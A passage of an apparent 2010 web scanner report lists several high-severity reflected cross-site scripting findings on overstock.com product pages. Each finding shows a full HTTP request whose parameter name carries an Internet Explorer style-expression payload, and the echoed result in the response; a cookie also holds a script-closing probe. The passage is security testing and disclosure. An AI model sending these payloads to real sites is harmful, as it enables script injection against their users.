This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html?93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:42:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:42:21 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:42:21 GMT; Path=/
Set-Cookie: mxcproclicks=3297897|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:42:21 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407341786:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="93008"style="x:expression(alert(1))"f9f5845dae2" value="1"/>
...[SNIP]...

2.139. http://www.overstock.com/Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b828a"style="x:expression(alert(1))"fb590d8c4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html?b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:37 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5197520|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:37 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406757140:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:37 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="b828a"style="x:expression(alert(1))"fb590d8c4d9" value="1"/>
...[SNIP]...

2.140. http://www.overstock.com/Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c48"style="x:expression(alert(1))"d00ea22d41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html?35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3600831|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:41 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406761354:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:41 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="35c48"style="x:expression(alert(1))"d00ea22d41f" value="1"/>
...[SNIP]...

2.141. http://www.overstock.com/Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79031"style="x:expression(alert(1))"8e8f24245d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html?79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:38:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:38:09 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407089801:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:09 GMT; Path=/
Set-Cookie: mxcproclicks=4064061|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:09 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124093

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="79031"style="x:expression(alert(1))"8e8f24245d4" value="1"/>
...[SNIP]...

2.142. http://www.overstock.com/Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c96b"style="x:expression(alert(1))"bf9819b8bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html?9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:49:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:49:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407779075:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:49:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2521006|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:49:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118364

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="9c96b"style="x:expression(alert(1))"bf9819b8bd6" value="1"/>
...[SNIP]...

2.143. http://www.overstock.com/Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04af"style%3d"x%3aexpression(alert(1))"f07952690ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e04af"style="x:expression(alert(1))"f07952690ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html?e04af"style%3d"x%3aexpression(alert(1))"f07952690ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:50:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:50:30 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:30 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3915400|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:30 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407830596:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="e04af"style="x:expression(alert(1))"f07952690ed" value="1"/>
...[SNIP]...

2.144. http://www.overstock.com/Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5bae"style="x:expression(alert(1))"51e68b0838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html?e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:58 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3570941|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:58 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407738493:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="e5bae"style="x:expression(alert(1))"51e68b0838" value="1"/>
...[SNIP]...

2.145. http://www.overstock.com/Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0b76"style="x:expression(alert(1))"ef556a36a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html?f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:50:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:50:19 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
